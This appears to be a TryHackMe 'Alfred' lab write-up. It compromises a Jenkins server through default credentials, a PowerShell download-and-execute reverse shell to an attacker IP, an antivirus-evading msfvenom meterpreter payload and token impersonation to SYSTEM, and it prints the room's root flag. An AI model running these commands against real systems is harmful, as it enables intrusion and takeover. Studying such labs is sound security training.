【THM】Alfred-Practice

Initial Access

1
nmap -p- -sC -sV -T4 10.10.206.74
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Nmap scan report for 10.10.206.74
Host is up (0.19s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2024-01-14T08:53:16
|_Not valid after:  2024-07-15T08:53:16
|_ssl-date: 2024-01-15T09:03:29+00:00; -2s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: ALFRED
|   NetBIOS_Domain_Name: ALFRED
|   NetBIOS_Computer_Name: ALFRED
|   DNS_Domain_Name: alfred
|   DNS_Computer_Name: alfred
|   Product_Version: 6.1.7601
|_  System_Time: 2024-01-15T09:03:25+00:00
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

image-20240115170008107

http://10.10.206.74:8080/

账号为admin密码为admin

image-20240115173233085

可以看到版本号Jenkins ver. 2.190.1

image-20240115174739667

点击project,再点configure

image-20240115235320520

填入

image-20240116000133494

1
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.63.201:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.63.201 -Port 9001

apply and save

image-20240115235939579

image-20240116000246747

成功

Switching Shells

为了简化权限提升,让我们使用以下过程切换到 meterpreter shell。

1
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.63.201 LPORT=9001 -f exe -o shell-name.exe

This payload generates an encoded x86-64 reverse TCP meterpreter payload. Payloads are usually encoded to ensure that they are transmitted correctly and also to evade anti-virus products. An anti-virus product may not recognise the payload and won’t flag it as malicious.

创建此有效负载后,使用上一步中的相同方法将其下载到计算机

1
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.63.201:8000/shell-name.exe','shell-name.exe')"

在运行此程序之前,请确保在 Metasploit 中设置了 handler

1
2
3
4
5
use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST 10.11.63.201 
set LPORT 9001 
run
1
Start-Process "shell-name.exe"

Privilege Escalation

现在,我们已获得初始访问权限,让我们使用令牌模拟来获取系统访问权限。

Windows 使用令牌来确保帐户具有执行特定操作的正确权限。帐户令牌在用户登录或进行身份验证时分配给帐户。这通常由 LSASS.exe 完成(将此视为身份验证过程)

This access token consists of:

  • User SIDs(security identifier)
  • Group SIDs
  • Privileges

Amongst other things. More detailed information can be found here.

There are two types of access tokens:

  • Primary access tokens: those associated with a user account that are generated on log on
  • Impersonation tokens: these allow a particular process(or thread in a process) to gain access to resources using the token of another (user/client) process

For an impersonation token, there are different levels:

  • SecurityAnonymous: current user/client cannot impersonate another user/client
  • SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client
  • SecurityImpersonation: current user/client can impersonate the client’s security context on the local system
  • SecurityDelegation: current user/client can impersonate the client’s security context on a remote system

Where the security context is a data structure that contains users’ relevant security information.

The privileges of an account(which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges:

  • SeImpersonatePrivilege
  • SeAssignPrimaryPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

There’s more reading here.

使用 whoami /priv 查看所有权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
C:\Program Files (x86)\Jenkins\workspace\project>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled

We can see privileges information. “enable” is an important detail for us.

You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let’s use the incognito module that will allow us to exploit this vulnerability.

Enter: load incognito to load the incognito module in Metasploit. Please note that you may need to use the use incognito command if the previous command doesn’t work. Also, ensure that your Metasploit is up to date.

1
2
3
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter >

To check which tokens are available, enter the list_tokens -g. We can see that the BUILTIN\Administrators token is available.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT SERVICE\AudioEndpointBuilder
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\PcaSvc
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\Winmgmt
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
No tokens available

Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators’ token. What is the output when you run the getuid command?

1
2
3
4
5
6
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter >

Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).

Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).
即使你拥有更高的特权令牌,你也可能没有特权用户的权限(这是由于 Windows 处理权限的方式 - 它使用进程的主令牌而不是模拟令牌来确定进程可以或不能执行的操作)。

Ensure that you migrate to a process with correct permissions (the above question’s answer). The safest process to pick is the services.exe process. First, use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS

image-20240116003341852

1
2
3
4
meterpreter > migrate 668
[*] Migrating from 2348 to 668...
[*] Migration completed successfully.
meterpreter > 
1
2
3
4
5
6
7
8
9
10
meterpreter > search -f root.txt
getuid            
Found 1 result...
=================

Path                                 Size (bytes)  Modified (UTC)
----                                 ------------  --------------
c:\Windows\System32\config\root.txt  70            2019-10-26 07:36:00 -0400
meterpreter > cat "c:\Windows\System32\config\root.txt"
��dff0f748678f280250f25a45b8046b4a